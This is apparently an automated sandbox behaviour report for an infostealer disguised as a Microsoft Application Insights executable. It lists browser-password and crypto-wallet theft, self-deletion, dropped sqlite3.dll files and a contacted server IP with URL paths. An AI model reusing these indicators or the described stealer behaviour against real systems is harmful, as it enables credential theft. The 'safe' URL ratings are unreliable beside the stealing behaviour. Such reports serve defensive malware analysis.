behaviorgraph top1 signatures2 2 Behavior Graph ID: 482276 Sample: Microsoft.ApplicationInsigh... Startdate: 13/09/2021 Architecture: WINDOWS Score: 72 30 Multi AV Scanner detection for submitted file 2->30 32 .NET source code references suspicious native API functions 2->32 34 .NET source code contains very large array initializations 2->34 8 Microsoft.ApplicationInsights.PersistenceChannel.exe 2 2->8         started        process3 signatures4 36 Self deletion via cmd delete 8->36 38 Contains functionality to detect sleep reduction / modifications 8->38 11 Microsoft.ApplicationInsights.PersistenceChannel.exe 127 8->11         started        16 WerFault.exe 23 9 8->16         started        process5 dnsIp6 28 77.222.42.92, 49759, 80 SWEB-ASRU Russian Federation 11->28 24 C:\Users\user\AppData\...\sqlite3[1].dll, PE32 11->24 dropped 26 C:\ProgramData\sqlite3.dll, PE32 11->26 dropped 40 Self deletion via cmd delete 11->40 42 Tries to harvest and steal browser information (history, passwords, etc) 11->42 44 Tries to steal Crypto Currency Wallets 11->44 18 cmd.exe 1 11->18         started        file7 signatures8 process9 process10 20 conhost.exe 18->20         started        22 timeout.exe 1 18->22         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
77.222.42.92
 unknown Russian Federation
44112 SWEB-ASRU false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://77.222.42.92/goodnews.php false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://77.222.42.92/public/sqlite3.dll false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown